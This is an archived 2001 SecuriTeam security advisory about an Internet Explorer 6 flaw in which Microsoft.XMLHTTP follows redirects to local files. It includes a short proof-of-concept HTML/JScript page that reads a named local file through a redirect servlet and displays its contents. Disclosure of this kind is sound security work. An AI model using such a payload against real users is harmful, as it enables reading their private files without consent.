[NT] Internet Explorer 6 Allows Local File Reading (XMLHTTP)
From: support@securiteam.comDate: 12/20/01
- Previous message: support@securiteam.com: "[NEWS] Zyxel Prestige 681 and 1600 Remote DoS"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: support@securiteam.com To: list@securiteam.com Date: Thu, 20 Dec 2001 03:58:06 +0100 (CET)
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -
Internet Explorer 6 Allows Local File Reading (XMLHTTP)
------------------------------------------------------------------------
SUMMARY
A bug in the Microsoft.XMLHTTP component shipped with Internet Explorer 6
allows reading and sending local files. The component does not handle HTTP
redirects to local files properly. In order for this exploit to work the
file name must be known. However, the exploit does not distinguish between
extensions, binary or textual content.
DETAILS
Vulnerable systems:
Internet Explorer 6.0
Demonstration:
A demonstration is available at <http://www.xs4all.nl/~jkuperus/bug.htm>
http://www.xs4all.nl/~jkuperus/bug.htm
Example:
(NOTE, the character 'I' has been replaced with an '!')
<html>
<head>
<title>Exploit</title>
<scr!pt language="jscript">
function doIt() {
// open the file on the users harddisk using a http
redirect
var xmlhttp = new ActiveXObject ("Microsoft.XMLHTTP");
xmlhttp.Open("GET",
"servlet/RedirectServlet?fileName=c:/jelmer.txt", false);
xmlhttp.Send();
alert(xmlhttp.responseText);
}
</script>
</head>
<body>
<button onclick="doIt()">Do it</button>
</body>
</html>
ADDITIONAL INFORMATION
The information has been provided by <mailto:jelmer@kuperus.xs4all.nl>
jelmer.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: support@securiteam.com: "[NEWS] Zyxel Prestige 681 and 1600 Remote DoS"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]